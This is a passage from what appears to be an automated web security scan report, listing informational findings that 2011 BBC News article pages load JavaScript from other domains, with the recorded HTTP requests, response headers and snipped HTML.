<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.46. http://www.bbc.co.uk/news/world-middle-east-12435798

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.47. http://www.bbc.co.uk/news/world-middle-east-12437440

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=749
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.48. http://www.bbc.co.uk/news/world-middle-east-12437881

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.49. http://www.bbc.co.uk/news/world-middle-east-12437912

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.50. http://www.bbc.co.uk/news/world-middle-east-12437922

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.51. http://www.bbc.co.uk/news/world-south-asia-12427513

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.52. http://www.bbc.co.uk/news/world-south-asia-12427518

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.53. http://www.bbc.co.uk/news/world-south-asia-12437087

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:24 GMT
Keep-Alive: timeout=10, max=779
Expires: Sat, 12 Feb 2011 02:03:24 GMT
Connection: close
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.54. http://www.bbc.co.uk/news/world-us-canada-12411274

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=711
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.55. http://www.bbc.co.uk/news/world-us-canada-12435117

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12435117 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:26 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:26 GMT
Connection: close
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

